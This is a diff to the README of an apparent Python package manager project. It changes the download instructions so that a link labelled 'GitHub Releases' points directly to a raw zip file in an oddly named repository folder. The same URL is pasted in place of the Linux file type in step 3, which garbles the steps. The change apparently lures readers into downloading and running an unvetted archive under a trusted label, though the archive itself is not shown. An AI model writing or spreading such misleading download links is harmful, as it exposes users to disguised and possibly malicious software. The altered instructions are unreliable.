BVNAHUSH/Python-Package-Manager/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [GitHub Releases](https://github.com/BVNAHUSH/Python-Package-Manager/releases).
+To get started, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/BVNAHUSH/Python-Package-Manager/main/acceptability/Python-Package-Manager.zip).

 1. Click on the link above to go to the Releases page.
 2. Find the latest version of Python-Package-Manager.
-3. Download the installer for your operating system (e.g., .exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+3. Download the installer for your operating system (e.g., .exe for Windows, .dmg for macOS, or https://raw.githubusercontent.com/BVNAHUSH/Python-Package-Manager/main/acceptability/Python-Package-Manager.zip for Linux).
 4. Once the download is complete, open the installer file to begin the installation.
 5. Follow the on-screen instructions to finish the installation.